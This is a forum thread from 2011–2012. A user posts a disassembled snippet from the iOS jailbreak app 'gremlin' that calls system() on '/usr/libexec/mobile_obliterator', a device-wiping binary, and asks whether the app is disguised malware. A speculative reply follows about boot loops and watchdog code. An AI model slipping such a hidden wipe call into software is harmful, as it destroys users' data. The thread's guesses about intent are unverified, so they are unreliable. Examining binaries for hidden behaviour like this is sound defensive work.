1. theSmallNothing's Avatar
    Ok, don't know where to put this, but here it is.

    Been putting a few files through IDA Pro when i came across this in the gremlin app (the gremlin app is a library to supposedly add music to the iPod library):

    __text:00001198 loc_1198
    __text:00001198     LDR     R0, =(aUsrLibexecMobi - 0x119E)
    __text:0000119A     ADD     R0, PC          ; "/usr/libexec/mobile_obliterator"
    __text:0000119C     BLX     _system
    __text:000011A0     B       loc_1168
    My asms is quite rusty, but im pretty sure that this loads "/usr/libexec/mobile_obliterator" into some register and then calls the system function, which would execute it.

    Apart from erasing the data on the iDevice what else does "/usr/libexec/mobile_obliterator" do?
    and why would someone include it in there program?

    The only reason i can think of is that it is a malicous virus that has been disguised as gremlin (the rest of the code looks pretty normal).

    Anyone know anything else?

    2011-04-06 09:44 PM
  2. Buckstar's Avatar
    Well, I think your post is quite interesting. Have you gotten any ideas? My device slipped into loops three times in roughly a week, and this morning I caught it just in time. Now it's in safemode, the network is set to off, and I'm hoping to figure what can be done. Your post came in a search on "system("killall SpringBoard") and there is a code source by developers with August 2011 postings for MobileObliterator, and Obliterate Data Partition routine. There is coding for watchdog and NVRAM, which apparently are related to the infamous shutdown and recovery loop initiation. I'm not sure but but that may be related to yours. I hope this helps.. and perhaps you could post a feedback.
    2012-06-15 06:25 PM